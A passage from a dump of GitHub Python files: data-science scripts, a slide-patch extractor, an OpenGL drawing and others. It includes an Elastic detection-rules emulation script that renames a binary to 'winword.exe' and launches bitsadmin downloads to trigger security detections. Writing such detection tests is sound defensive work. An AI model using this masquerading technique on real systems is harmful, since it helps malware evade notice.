val].count()[feature], # All\n df[(df[feature] == val) & (df[target] == 0)].count()[feature], # Good (think: Fraud == 0)\n df[(df[feature] == val) & (df[target] == 1)].count()[feature]]) # Bad (think: Fraud == 1)\n\n data = pd.DataFrame(lst, columns=['Variable', 'Value', 'All', 'Good', 'Bad'])\n\n data['Share'] = data['All'] / data['All'].sum()\n data['Bad Rate'] = data['Bad'] / data['All']\n data['Distribution Good'] = (data['All'] - data['Bad']) / (data['All'].sum() - data['Bad'].sum())\n data['Distribution Bad'] = data['Bad'] / data['Bad'].sum()\n data['WoE'] = np.log(data['Distribution Good'] / data['Distribution Bad'])\n\n data = data.replace({'WoE': {np.inf: 0, -np.inf: 0}})\n\n data['IV'] = data['WoE'] * (data['Distribution Good'] - data['Distribution Bad'])\n\n data = data.sort_values(by=['Variable', 'Value'], ascending=[True, True])\n data.index = range(len(data.index))\n print(data)\n\n\n\n\nimport numpy as np\nimport pandas as pd\nimport os\nos.chdir('/home/vasste/ml')\nfrom telecom.train_columns import *\nos.chdir('/home/vasste/mlbootcap/TelecomDataCup/dataset')\n\nf = pd.read_pickle('train/subs_features_train.pk')\nc = pd.read_pickle('train/subs_csi_train.pk')\nfor i in ['1', '2', '3', '34', '8']:\n for j in ['32', '33', '17']:\n f['COM_CAT#' + i + j] = f['COM_CAT#' + i] * f['COM_CAT#' + j]\n\nfor i in ['ARPU_GROUP', 'RENT_CHANNEL', 'ITC', 'VAS']:\n for j in ['32', '33', '17', '22', '28']:\n f[i + '#' + j] = f[i] * f['COM_CAT#' + j]\nf = f.join(c)\nf['INTERNET_TYPE_ID']\nf = f.reindex(['CSI'] + list([a for a in f.columns if a != 'CSI']), axis=1)\nf = pd.get_dummies(f, columns=['BASE_TYPE','ACT', 'COM_CAT#26'])\nf.corr().style.background_gradient()","repo_name":"vasste/py-competitions","sub_path":"mlbootcamp/telecom/woe_iv.py","file_name":"woe_iv.py","file_ext":"py","file_size_in_byte":2765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"200777863","text":"from skimage.color import rgb2gray\nimport numpy as np\nfrom openslide import open_slide, __library_version__ as openslide_version\nfrom typing import Dict\nimport matplotlib.pyplot as plt\nimport os\nfrom tqdm import tqdm\nfrom typing import Dict,Tuple\nimport argparse\nfrom PIL import Image\nimport re\nimport time\nos.chdir(\"C:\\\\Users\\\\aroni\\\\Documents\\\\adl-f22\\\\adl-fall2022-prj\")\nfrom doc.core.utils import custom_logger\n\ndef read_slide(slide, pos, level, dimension, as_float=False):\n im = slide.read_region(pos, level, dimension)\n im = im.convert('RGB') # drop the alpha channel\n if as_float:\n im = np.asarray(im, dtype=np.float32)\n else:\n im = np.asarray(im)\n return im\n\nclass SlideWindow:\n\n def __init__(self,\n slide,\n tumor_mask,\n windows_dim : Tuple[int],\n level : int,\n stride : int,\n threshold : Dict[str,int]\n ) -> None:\n self.slide = slide\n self.tumor_mask = tumor_mask\n self.windows_dim = windows_dim\n self.level = level\n self.stride = stride\n self.threshold = threshold\n level_dimension = slide.level_dimensions[level]\n tot_slide = read_slide(self.slide,np.array((0,0)),self.level,level_dimension)\n self.gray_slide = rgb2gray(tot_slide)\n self.windows =[\n (x,y) for y in range(0,level_dimension[1],stride) for x in range(0,level_dimension[0],stride)\n ]\n self.num_windows = len(self.windows)\n self.windows = iter(self.windows)\n\n \n def move_window(self):\n x,y = next(self.windows)\n pixels_in_window = self.gray_slide[y:(y+self.stride),x:(x+self.stride)]\n percentage_gray_pixel = np.mean(pixels_in_window<=self.threshold[\"gray\"])\n if percentage_gray_pixel>self.threshold[\"percentage_tissues\"]:\n self.pos = np.array((x,y)) + np.array((self.stride,self.stride))//2 - np.array(self.windows_dim)//2\n return True\n else :\n return False\n \n def get_zoomed_imgs(\n self,\n levels_zoom,\n patch_name,\n file\n )->Dict:\n for zoom in levels_zoom:\n self.zoomed_pos = self.pos + np.array(self.windows_dim)//2\n self.zoomed_pos -= np.array(self.windows_dim)//(2**(zoom+1))\n self.zoomed_pos = (self.zoomed_pos*(2**(self.level))).astype(\"int32\")\n img = read_slide(\n self.slide,\n self.zoomed_pos,\n self.level-zoom,\n self.windows_dim\n )\n img = Image.fromarray(img)\n dir_path = os.path.join(\"./data/patches\",\"zoom_x\"+str(2**zoom))\n if not os.path.exists(dir_path):\n os.mkdir(dir_path)\n file_name = os.path.join(dir_path,patch_name)\n img.save(file_name)\n mask_image = read_slide(\n self.tumor_mask,\n self.zoomed_pos,\n self.level-zoom,\n self.windows_dim\n )\n mask_image = mask_image[:,:,0]\n file.write(file_name+\",\")\n file.write(str(int((mask_image>0).any()))+\"\\n\")\n\n \ndef build_training_patches(logger,slide_name,tumor_mask_name,args,file):\n logger.info(f\"Building the training patches for the slide {slide_name}\")\n slide_path = os.path.join('./data',slide_name) # only this file is available\n tumor_mask_path = os.path.join('./data', tumor_mask_name) # only this file is available\n\n slide_url = 'https://storage.googleapis.com/adl2022-slides/%s' % slide_name\n mask_url = 'https://storage.googleapis.com/adl2022-slides/%s' % tumor_mask_name\n\n # Download the whole slide image\n if not os.path.exists(slide_path):\n logger.info(f\"Missing slide downloading it from {slide_url}\")\n os.chdir(\"./data/\")\n os.system(f\"curl -O {slide_url}\")\n os.chdir(\"..\")\n\n # Download the tumor mask\n if not os.path.exists(tumor_mask_path):\n logger.info(f\"Missing mask slide downloading it from {mask_url}\")\n os.chdir(\"./data/\")\n os.system(f\"curl -O {mask_url}\")\n os.chdir(\"..\")\n \n logger.info(\"Opening the slide/mask\")\n slide = open_slide(slide_path)\n tumor_mask = open_slide(tumor_mask_path)\n sw = SlideWindow(\n slide,\n tumor_mask,\n windows_dim=(args.window_size,args.window_size),\n level=args.level,\n stride=args.stride,\n threshold={\n \"gray\" : args.gray_threshold,\n \"percentage_tissues\" : args.pixel_threshold\n }\n )\n num_patches_extracted = 0\n t = time.time()\n with tqdm(range(sw.num_windows),leave=False) as p_bar:\n for i in p_bar:\n if sw.move_window():\n sw.get_zoomed_imgs(\n args.number_of_zooms,\n \"_\".join([re.sub(\".tif\",\"\",slide_name),str(i)])+\".jpg\",\n file\n )\n num_patches_extracted +=1\n logger.info(f\"Extracted {num_patches_extracted} from the slide {slide_name} took {round(time.time()-t)} seconds\")\n os.remove(slide_path)\n os.remove(tumor_mask_path)\n logger.info(\"Deleting from disk the downloaded slides\")\n\n\nif __name__ == \"__main__\":\n logger = custom_logger()\n parser = argparse.ArgumentParser(description=\"Build the number of patches from an input slide\")\n parser.add_argument('--number_of_zooms',type=int,nargs='+',default=[0,1,3])\n parser.add_argument('--slides',type=str,default=None,nargs='+')\n parser.add_argument('--window_size',type=int,default=299)\n parser.add_argument('--stride',type=int,default=32)\n parser.add_argument('--level',type=int,default=3)\n parser.add_argument('--gray_threshold',type=float,default=0.8)\n parser.add_argument('--pixel_threshold',type=float,default=0.2)\n args = parser.parse_args()\n if args.slides == None:\n with open(\"./data/slides_name.txt\",\"r\") as file:\n slides = file.read().splitlines()\n else :\n slides = args.slides\n with open(\"./data/patches_tumor_label.csv\",\"w\") as file:\n with tqdm(slides) as p_bar:\n p_bar.set_description(\"Slide extracted \")\n for slide in p_bar:\n slide_name = \"tumor_\"+slide+\".tif\"\n tumor_mask_name = \"tumor_\"+slide+\"_mask.tif\"\n build_training_patches(logger,slide_name,tumor_mask_name,args,file)\n\n\n ","repo_name":"clement-micol/adl-fall2022-prj","sub_path":"doc/core/sliding_window.py","file_name":"sliding_window.py","file_ext":"py","file_size_in_byte":6410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"2240631696","text":"import subprocess\nfrom pathlib import Path\nfrom . import common\nfrom . import RtaMetadata\n\n\nmetadata = RtaMetadata(\n uuid=\"e7a55d39-37b4-4f37-9519-3779b3c23bfa\",\n platforms=[\"windows\"],\n endpoint=[\n {\"rule_name\": \"Suspicious Bitsadmin Activity\", \"rule_id\": \"676ac66c-4899-498f-ae21-ed5620af5477\"},\n {\"rule_name\": \"Suspicious Microsoft Office Child Process\", \"rule_id\": \"c34a9dca-66cf-4283-944d-1800b28ae690\"},\n ],\n siem=[],\n techniques=[\"T1197\", \"T1566\"],\n)\n\nROOT_DIR = Path(__file__).parent\nEXE_FILE = common.get_path(\"bin\", \"renamed.exe\")\n\n\n@common.requires_os(*metadata.platforms)\ndef main():\n\n fake_word = ROOT_DIR / \"winword.exe\"\n common.log(f\"Copying {EXE_FILE} to {fake_word}\")\n common.copy_file(EXE_FILE, fake_word)\n\n command = subprocess.list2cmdline([\"bitsadmin.exe\", \"/Transfer\", \"/Download\"])\n common.execute([fake_word, \"/c\", command], timeout=15, kill=True)\n common.execute([\"taskkill\", \"/f\", \"/im\", \"bitsadmin.exe\"])\n\n common.remove_files(fake_word)\n\n\nif __name__ == \"__main__\":\n exit(main())\n","repo_name":"elastic/detection-rules","sub_path":"rta/bitsadmin_execution.py","file_name":"bitsadmin_execution.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"en","doc_type":"code","stars":1654,"dataset":"github-code","pt":"63"} +{"seq_id":"37786321247","text":"with open('english_words_upper_cleaner.txt', 'r') as f:\n words = f.read().splitlines()\n\nwith open('dictionary.js', 'w') as f:\n f.write('const dictionary = [\\n')\n for i, word in enumerate(words):\n if len(word) <= 10 and len(word) >= 3:\n if i == len(words) - 1:\n f.write(f' \"{word}\"\\n')\n else:\n f.write(f' \"{word}\",\\n')\n f.write('];\\n')\n","repo_name":"TaoseefAziz/Wordtris","sub_path":"auxiliary/words_to_js.py","file_name":"words_to_js.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"5102877738","text":"import argparse\nfrom collections import defaultdict\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"file\")\nparser.add_argument(\"splits\")\nargs = parser.parse_args()\n\n\ndef write_file(f_out, sentences):\n for sentence in sentences:\n for line in sentence.split('\\n'):\n f_out.write(' '.join(line.split()[1:]))\n f_out.write('\\n')\n f_out.write('\\n')\n\ntrain_ids = set()\ntest_ids = set()\ndev_ids = set()\n\nwith open(args.splits + '.train', 'r') as f_in:\n for line in f_in:\n train_ids.add(line.strip())\n\nwith open(args.splits + '.test', 'r') as f_in:\n for line in f_in:\n test_ids.add(line.strip())\n\nwith open(args.splits + '.dev', 'r') as f_in:\n for line in f_in:\n dev_ids.add(line.strip())\n\ntrain_ids = sorted(train_ids)\ntest_ids = sorted(test_ids)\ndev_ids = sorted(dev_ids)\n\nwith open(args.file, 'r') as f_in:\n text = f_in.read()\n sentences = [x.strip() for x in text.split('\\n\\n') if x.split()]\n sentences_per_doc = defaultdict(list)\n for sentence in sentences:\n doc_id = sentence.split()[0]\n sentences_per_doc[doc_id].append(sentence)\n\n train = []\n test = []\n dev = []\n\n for doc_id in train_ids:\n if len(sentences_per_doc[doc_id]) > 0:\n train += [\"0 -DOCSTART- X X O\"] # add dummy id as first column will be removed\n train += sentences_per_doc[doc_id]\n\n for doc_id in test_ids:\n if len(sentences_per_doc[doc_id]) > 0:\n test += [\"0 -DOCSTART- X X O\"]\n test += sentences_per_doc[doc_id]\n\n for doc_id in dev_ids:\n if len(sentences_per_doc[doc_id]) > 0:\n dev += [\"0 -DOCSTART- X X O\"]\n dev += sentences_per_doc[doc_id]\n\n with open(args.file+'.train', 'w') as f_out:\n write_file(f_out, train)\n with open(args.file+'.dev', 'w') as f_out:\n write_file(f_out, dev)\n with open(args.file+'.test', 'w') as f_out:\n write_file(f_out, test)\n","repo_name":"miladnouriezade/HUNER-evaluation","sub_path":"huner/ner_scripts/scripts/split_corpora.py","file_name":"split_corpora.py","file_ext":"py","file_size_in_byte":1957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"39645512059","text":"import yfinance, utils\nimport pandas as pd\n\nutils.http.enableLogger()\nutils.http.enableCache()\n\npd.options.mode.chained_assignment = None # default='warn'\ncache = {}\n\ndef get(ticker='AAPL', period='100y', start=None, end=None, fromCache=True):\n if fromCache and ticker in cache:\n return cache.get(ticker)\n\n company = yfinance.Ticker(ticker)\n cache[ticker] = company.history(period=period, start=start, end=end)\n return cache[ticker]\n\n\ndef getByDate(ticker, date):\n try:\n df = get(ticker)\n return df.iloc[df.index.get_loc(date, method='pad')]\n except KeyError:\n return\n\n\ndef getDateIndex(history, date):\n return history.index.get_loc(date)","repo_name":"sanprojects/stocksStrategyTester","sub_path":"history.py","file_name":"history.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"11986916085","text":"import logging\nimport typing as t\n\nfrom components.application.uc_base import UseCaseBase\nfrom components.application.uc_request import GenericUseCaseRequest\nfrom components.application.uc_response import (\n GenericUseCaseResponse,\n UseCaseErrorResponse,\n UseCaseResponseStatus,\n)\nfrom components.domain.activity_type import ActivityType\nfrom components.domain.compensation_request import CompensationRequest\nfrom components.domain.project import Project\nfrom components.domain.repository_interfaces.activity_types_interface import (\n ActivityTypesRepositoryProtocol,\n)\nfrom components.domain.repository_interfaces.compensation_requests_interface import (\n CompensationRequestDTO,\n CompensationRequestsRepositoryProtocol,\n)\nfrom components.domain.repository_interfaces.projects_interface import (\n ProjectsRepositoryProtocol,\n)\nfrom components.domain.repository_interfaces.trainers_interface import (\n TrainersRepositoryProtocol,\n)\nfrom components.domain.repository_interfaces.users_interface import (\n UsersRepositoryProtocol,\n)\nfrom components.domain.user import Trainer, User\n\n_logger = logging.getLogger(__name__)\n\n\nUseCaseRequest = GenericUseCaseRequest[None]\nUseCaseResponse = GenericUseCaseResponse[t.List[CompensationRequest]]\n\n\nclass GetCompensationRequests(UseCaseBase):\n Request = UseCaseRequest\n Response = UseCaseResponse\n\n def __init__(\n self,\n activity_types_sql_repository: ActivityTypesRepositoryProtocol,\n projects_sql_repository: ProjectsRepositoryProtocol,\n users_sql_repository: UsersRepositoryProtocol,\n trainers_sql_repository: TrainersRepositoryProtocol,\n compensation_requests_sql_repository: CompensationRequestsRepositoryProtocol,\n ):\n self.project_sql_repository = projects_sql_repository\n self.users_sql_repository = users_sql_repository\n self.trainers_sql_repository = trainers_sql_repository\n self.compensation_requests_sql_repository = compensation_requests_sql_repository\n self.activity_types_sql_repository = activity_types_sql_repository\n\n async def execute(\n self, request: UseCaseRequest\n ) -> t.Union[UseCaseResponse, UseCaseErrorResponse]:\n _logger.info(\n f\"Processing GetCompensationRequests use case with request.data:{request.data}\"\n )\n\n compensation_requests: t.List[\n CompensationRequestDTO\n ] = await self.compensation_requests_sql_repository.get_compensation_requests()\n\n user_ids = set()\n trainer_ids = set()\n project_ids = set()\n for r in compensation_requests:\n user_ids.add(r.created_by_id)\n if r.request_initiator_id:\n user_ids.add(r.request_initiator_id)\n trainer_ids.add(r.trainer_id)\n project_ids.add(r.project_id)\n\n users: t.List[User] = await self.users_sql_repository.get_users(\n user_ids=list(user_ids)\n )\n trainers: t.List[Trainer] = await self.trainers_sql_repository.get_trainers(\n trainer_ids=list(trainer_ids)\n )\n projects: t.List[Project] = await self.project_sql_repository.get_projects(\n project_ids=list(project_ids)\n )\n activity_types: t.List[\n ActivityType\n ] = await self.activity_types_sql_repository.get_activity_types()\n\n project_id_to_project: t.Dict[int, Project] = {\n project.id: project for project in projects\n }\n\n trainer_id_to_trainer: t.Dict[int, Trainer] = {\n trainer.id: trainer for trainer in trainers\n }\n\n activity_type_id_to_name: t.Dict[int, str] = {\n activity_type.id: activity_type.name for activity_type in activity_types\n }\n\n user_id_to_user: t.Dict[int, User] = {user.id: user for user in users}\n result = []\n for r in compensation_requests:\n result.append(\n CompensationRequest(\n id=r.id,\n status=r.status,\n created_by=user_id_to_user[r.created_by_id],\n trainer=trainer_id_to_trainer[r.trainer_id],\n project=project_id_to_project[r.project_id],\n training_type=r.training_type,\n request_initiator=user_id_to_user[r.request_initiator_id]\n if r.request_initiator_id\n else None,\n created_at_ts=r.created_at_ts,\n activity_date=r.activity_date,\n activity_type=activity_type_id_to_name[r.activity_type_id],\n is_rewarded=r.is_rewarded,\n course_id=r.course_id,\n rd_point=r.rd_point,\n skill=r.skill,\n )\n )\n\n return self.Response.build(status=UseCaseResponseStatus.SUCCESS, data=result)\n","repo_name":"prernadubey/contribution_tool","sub_path":"components/application/get_compensation_requests.py","file_name":"get_compensation_requests.py","file_ext":"py","file_size_in_byte":4894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"74316720196","text":"from OpenGL.GL import *\nfrom OpenGL.GLU import *\nfrom OpenGL.GLUT import *\nimport sys\nfrom numpy import pi, sin, cos\n\nstate = [0.8, -0.95, pi/2]\nturn = pi/8\nmoves = 'LFRFRSRFLFLPLSLFRFRFP'\nmax_depth = 3\nF = [2/84]*2\n# L - Left\n# R - Right\n# F - Front\n# S - Save(Push)\n# P - Pop\n\ndef action(cur_depth):\n global state\n tmp = None\n if cur_depth != 1:\n for symbol in moves:\n if symbol == 'F':\n if cur_depth == max_depth:\n glVertex2f(state[0], state[1])\n glVertex2f(state[0]+F[0]*cos(state[2]), state[1]+F[1]*sin(state[2]))\n state = [state[0]+F[0]*cos(state[2]), state[1]+F[1]*sin(state[2]), state[2]]\n else:\n action(cur_depth+1)\n elif symbol == 'L':\n # print(state)\n state[2] += turn\n elif symbol == 'R':\n # print(state)\n state[2] -= turn\n elif symbol == 'S':\n tmp = state.copy()\n elif symbol == 'P':\n if not (tmp is None):\n state = tmp.copy()\n else:\n raise ValueError(\"tmp state is None\")\n\n else:\n if max_depth == 1:\n glVertex2f(state[0], state[1])\n glVertex2f(state[0]+F[0]*cos(state[2]), state[1]+F[1]*sin(state[2]))\n print('this way')\n else:\n action(cur_depth+1)\n\n\ndef display():\n glClearColor(255, 255, 255, 1)\n glClear(GL_COLOR_BUFFER_BIT)\n glColor4f(255,0,0,1.0)\n glBegin(GL_LINES)\n action(1)\n glEnd()\n glFinish()\n\n\ndef keyboard(key, x, y):\n ESCAPE = '\\027'\n if key == ESCAPE:\n exit(0)\n\n\nif __name__ == '__main__':\n win_size = [933, 700]\n glutInit(sys.argv)\n glutInitDisplayMode(GLUT_RGBA)\n glutInitWindowSize(*win_size)\n glutInitWindowPosition(100, 0)\n glutCreateWindow(\"test\")\n glutDisplayFunc(display)\n glutKeyboardFunc(keyboard)\n\n glutMainLoop()\n","repo_name":"cherowl/graphics","sub_path":"lab_3/bush.py","file_name":"bush.py","file_ext":"py","file_size_in_byte":1996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"12560120109","text":"from openpyxl import load_workbook\nimport pandas as pd\n\n\ndef write_logs_to_excel(time, user, user_id, text, answer):\n writer = pd.ExcelWriter('logs.xlsx', engine='openpyxl')\n wb = load_workbook('logs.xlsx')\n ws = wb[\"Sheet\"]\n\n df_new_u = pd.DataFrame({\"user\": [user]})\n df_new_uid = pd.DataFrame({\"user_id\": [user_id]})\n df_new_time = pd.DataFrame({\"time\": [time]})\n df_new_ut = pd.DataFrame({\"user_text\": [text]})\n df_new_ba = pd.DataFrame({\"bot_answer\": [answer]})\n\n for index, row in df_new_u.iterrows():\n cell = \"A%d\" % (index + 2)\n ws[cell] = row[0]\n\n for index, row in df_new_uid.iterrows():\n cell = \"B%d\" % (index + 2)\n ws[cell] = row[0]\n\n for index, row in df_new_time.iterrows():\n cell = \"C%d\" % (index + 2)\n ws[cell] = row[0]\n\n for index, row in df_new_ut.iterrows():\n cell = \"D%d\" % (index + 2)\n ws[cell] = row[0]\n\n for index, row in df_new_ba.iterrows():\n cell = \"E%d\" % (index + 2)\n ws[cell] = row[0]\n\n wb.save(\"logs.xlsx\")\n print(\"log saved...\")\n\n\ndef log(message, answer):\n from datetime import datetime\n time = str(datetime.now())\n user = str(message.from_user.first_name)\n user_id = str(message.from_user.id)\n text = str(message.text)\n bot_answer = str(answer)\n write_logs_to_excel(time, user, user_id, text, bot_answer)\n","repo_name":"aekrops/python-telegram-bot","sub_path":"utils/logs.py","file_name":"logs.py","file_ext":"py","file_size_in_byte":1374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"29662717620","text":"import csv, pathlib, os\n\nclass Storage():\n\n def __init__(self):\n self.save_path = './csv/'\n\n # Saves the values from the trainig runs and the calculated validation accuracy to a csv file.\n # @optimizer_name Name of the selected optimizer. Necessaray to load the correct file. \n # @kind specifies the save file string either to training or validation.\n # @data_to_save what kind of data to be saved: training_loss or validation accuracy\n def save_csv_file(self, optimizer_name, kind, data_to_save, batch_size):\n try:\n os.mkdir(self.save_path)\n except FileExistsError:\n pass\n with open(f'{self.save_path}{optimizer_name}_{kind}_{batch_size}.csv', 'a', newline='') as csv_validation:\n writer = csv.writer(csv_validation, delimiter=',')\n writer.writerow(data_to_save)\n data_to_save.clear()\n\n # Loads the saved training data csv file.\n # @optimizer_name Name of the selected optimizer. Necessaray to load the correct file.\n # @kind specifies the save file string either to training or validation. \n # @return a list for each row in the csv file, number of lists\n def load_loss_csv(self, optimizer_name, kind, batch_size): \n loss_list = [] \n try:\n with open(f'{self.save_path}{optimizer_name}_{kind}_{batch_size}.csv', newline='') as csv_loss:\n loss = csv.reader(csv_loss, delimiter=',', quoting=csv.QUOTE_NONNUMERIC) \n number_of_lists = 0\n data_list = []\n for row in loss:\n data_list.append(row)\n number_of_lists += 1\n loss_list.append(data_list) \n except FileExistsError:\n print('File not found.')\n return loss_list, number_of_lists\n\n # Loads the saved validation data csv file.\n # @optimizer_name Name of the selected optimizer. Necessaray to load the correct file.\n # @kind specifies the save file string either to training or validation.\n # @return a list of all measured accuracys.\n def load_accuracy_csv(self, optimizer_name, kind, batch_size):\n validation_list = []\n try:\n with open(f'{self.save_path}{optimizer_name}_{kind}_{batch_size}.csv', newline='') as csv_validation:\n validation = csv.reader(csv_validation, delimiter=',', quoting=csv.QUOTE_NONNUMERIC)\n for row in validation:\n validation_list.append(row)\n except FileExistsError:\n print('File not found.') \n return validation_list\n","repo_name":"Telespielstube/benchmarker","sub_path":"storage.py","file_name":"storage.py","file_ext":"py","file_size_in_byte":2714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"37604012042","text":"from source.config import CV_BOOTSTRAP_FRACTION\nfrom source.stability.base_stability_analyzer import BaseStabilityAnalyzer\n\n\nclass IncrementalStabilityAnalyzer(BaseStabilityAnalyzer):\n def __init__(self, base_model, base_model_name, train_pd_dataset, test_pd_dataset, test_y_true,\n dataset_reader, dataset_name, n_estimators=100, prediction_mapping=None):\n \"\"\"\n :param n_estimators: a number of estimators in ensemble to measure evaluation_model stability\n :param prediction_mapping: dict, used to map model predictions to final results.\n For example, LogisticRegression always returns True or False values, but for stability measuring we need numbers\n \"\"\"\n super().__init__(base_model, base_model_name, CV_BOOTSTRAP_FRACTION,\n train_pd_dataset, dataset_reader(pd_dataset=test_pd_dataset),\n test_y_true, dataset_name, n_estimators)\n self.__prediction_mapping = prediction_mapping\n self.dataset_reader = dataset_reader\n\n def _batch_predict(self, classifier, test_dataset):\n predictions = []\n for x, y_true in test_dataset:\n y_pred = classifier.predict_one(x)\n if self.__prediction_mapping is not None:\n y_pred = self.__prediction_mapping[y_pred]\n predictions.append(y_pred)\n\n return predictions\n\n def _batch_predict_proba(self, classifier, test_dataset):\n predictions = []\n for x, y_true in test_dataset:\n y_pred = classifier.predict_proba_one(x)[0]\n if self.__prediction_mapping is not None:\n y_pred = self.__prediction_mapping[y_pred]\n predictions.append(y_pred)\n\n return predictions\n\n def _fit_model(self, classifier, train_df):\n train_dataset = self.dataset_reader(pd_dataset=train_df)\n for x, y_true in train_dataset:\n classifier.learn_one(x=x, y=y_true)\n\n return classifier\n","repo_name":"denysgerasymuk799/Online-ML-Stability","sub_path":"source/stability/incremental_stability_analyzer.py","file_name":"incremental_stability_analyzer.py","file_ext":"py","file_size_in_byte":1981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"71272772999","text":"import datetime\nimport sys\n\nfrom flask import render_template, Blueprint\nfrom flask_login import current_user, login_required\n\nfrom core.utils import get_current_book\nfrom core.tables import Progress, Books, User\nfrom core.forms import ProgressForm\nfrom core.db import db\n\nprogress = Blueprint(\"progress\", __name__, url_prefix=\"/progress\")\n\n\n@progress.route(\"/\")\n@login_required\ndef progress_graph():\n return render_template(\"progress/progress.html\", book=get_current_book())\n\n\n@progress.route(\"/book/\")\n@login_required\ndef progress_data_handler(id):\n return render_template(\"progress/progress.html\", book=db.session.query(Books).filter_by(id=id).first())\n\n\n@progress.route(\"/update\", methods=[\"POST\"])\n@login_required\ndef progress_update():\n form = ProgressForm()\n\n if form.validate_on_submit():\n book_id = int(form.id.data)\n progress = int(form.progress.data)\n\n db.session.add(Progress(datetime.datetime.now(), book_id, int(current_user.id), progress))\n db.session.commit()\n return \"Weeeee, you have read \" + str(progress) + \"% of this book!\"\n\n return \"Something wrong\"\n\n\n@progress.route(\"/data/\")\n@login_required\ndef progress_book_handler(id):\n book = db.session.query(Books).filter_by(id=id).first()\n progress_data = []\n if not book:\n return render_template(\"plain_data.html\", progress_data=progress_data)\n\n users = {user.id : user.first_name for user in User.query.all()}\n progress_per_user = {user_id : [] for user_id in users}\n\n world_creation = datetime.datetime(1970, 1, 1)\n\n min_date = sys.maxsize\n for progress in Progress.query.filter_by(book_id=book.id).all():\n timestamp = int(1000 * (progress.timestamp - world_creation).total_seconds())\n progress_per_user[progress.user_id] += [[timestamp, progress.progress]]\n min_date = min(min_date, timestamp - 1000 * 24 * 60 * 60)\n\n if min_date == sys.maxsize:\n progress_data = []\n else:\n progress_data = [{\"key\": users[id],\n \"values\": [[min_date, 0]] + progress_per_user[id]}\n for id in users]\n\n return render_template(\"plain_data.html\", data=progress_data)\n","repo_name":"Ignotus/bookclub","sub_path":"routes/progress.py","file_name":"progress.py","file_ext":"py","file_size_in_byte":2203,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"62"} +{"seq_id":"29814729608","text":"import os.path as osp\nimport re\nfrom collections import defaultdict\n\nfrom valids import parser, main as valids_main\n\n\nTASK_TO_METRIC = {\n \"cola\": \"mcc\",\n \"qnli\": \"accuracy\",\n \"mrpc\": \"acc_and_f1\",\n \"rte\": \"accuracy\",\n \"sst_2\": \"accuracy\",\n \"mnli\": \"accuracy\",\n \"qqp\": \"acc_and_f1\",\n \"sts_b\": \"pearson_and_spearman\",\n}\nTASKS = [\"cola\", \"qnli\", \"mrpc\", \"rte\", \"sst_2\", \"mnli\", \"qqp\", \"sts_b\"]\n\n\ndef get_best_stat_str(task_vals, show_subdir):\n task_to_best_val = {}\n task_to_best_dir = {}\n for task, subdir_to_val in task_vals.items():\n task_to_best_val[task] = max(subdir_to_val.values())\n task_to_best_dir[task] = max(subdir_to_val.keys(), key=lambda x: subdir_to_val[x])\n\n # import pdb; pdb.set_trace()\n N1 = len(task_to_best_val)\n N2 = len([k for k in task_to_best_val if k != \"rte\"])\n avg1 = sum(task_to_best_val.values()) / N1\n avg2 = sum(v for task, v in task_to_best_val.items() if task != \"rte\") / N2\n\n try:\n msg = \"\"\n for task in TASKS:\n dir = task_to_best_dir.get(task, 'null')\n val = task_to_best_val.get(task, -100)\n msg += f\"({dir}, {val})\\t\" if show_subdir else f\"{val}\\t\"\n msg += f\"{avg1:.2f}\\t{avg2:.2f}\"\n except Exception as e:\n msg = str(e)\n msg += str(sorted(task_vals.items()))\n return msg\n\ndef get_all_stat_str(task_vals):\n msg = \"\"\n for task in [task for task in TASKS if task in task_vals]:\n msg += f\"=== {task}\\n\"\n for subdir in sorted(task_vals[task].keys()):\n msg += f\"\\t{subdir}\\t{task_vals[task][subdir]}\\n\"\n return msg\n\ndef get_tabular_stat_str(task_vals):\n \"\"\"assume subdir is /run_*/0\"\"\"\n msg = \"\"\n for task in [task for task in TASKS if task in task_vals]:\n msg += f\"=== {task}\\n\"\n param_to_runs = defaultdict(dict)\n for subdir in task_vals[task]:\n match = re.match(\"(.*)/(run_.*)/0\", subdir)\n assert match, \"subdir\"\n param, run = match.groups()\n param_to_runs[param][run] = task_vals[task][subdir]\n params = sorted(param_to_runs, key=lambda x: float(x))\n runs = sorted(set(run for runs in param_to_runs.values() for run in runs))\n msg += (\"runs:\" + \"\\t\".join(runs) + \"\\n\")\n msg += (\"params:\" + \"\\t\".join(params) + \"\\n\")\n for param in params:\n msg += \"\\t\".join([str(param_to_runs[param].get(run, None)) for run in runs])\n msg += \"\\n\"\n # for subdir in sorted(task_vals[task].keys()):\n # msg += f\"\\t{subdir}\\t{task_vals[task][subdir]}\\n\"\n return msg\n\n \n\ndef main():\n parser.add_argument(\"--show_glue\", action=\"store_true\", help=\"show glue metric for each task instead of accuracy\")\n parser.add_argument(\"--print_mode\", default=\"best\", help=\"best|all|tabular\")\n parser.add_argument(\"--show_subdir\", action=\"store_true\", help=\"print the subdir that has the best results for each run\")\n parser.add_argument(\"--override_target\", default=\"valid_accuracy\", help=\"override target\")\n\n args = parser.parse_args()\n args.target = args.override_target\n args.best_biggest = True\n args.best = True\n args.last = 0\n args.path_contains = None\n \n res = valids_main(args, print_output=False)\n grouped_acc = {}\n grouped_met = {} # use official metric for each task\n for path, v in res.items():\n path = \"/\".join([args.base, path])\n path = re.sub(\"//*\", \"/\", path)\n match = re.match(\"(.*)finetune[^/]*/([^/]*)/(.*)\", path)\n if not match:\n continue\n run, task, subdir = match.groups()\n\n if run not in grouped_acc:\n 